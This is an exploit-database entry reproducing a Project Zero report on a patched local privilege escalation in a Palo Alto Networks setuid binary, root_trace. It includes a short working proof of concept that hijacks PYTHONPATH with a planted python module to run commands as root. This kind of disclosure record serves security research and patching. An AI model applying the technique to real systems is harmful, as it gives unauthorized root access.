header-logo
Suggest Exploit
vendor:
N/A
by:
Project Zero
7,2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

setuid root executable /usr/local/bin/root_trace

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script. As the environment is not scrubbed, an attacker can set the PYTHONPATH environment variable to a malicious python script and execute the root_trace executable to gain root privileges.

Mitigation:

The vulnerability was fixed by PAN in their security advisory: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67

Navigation

Suggest Exploit

Services By CQR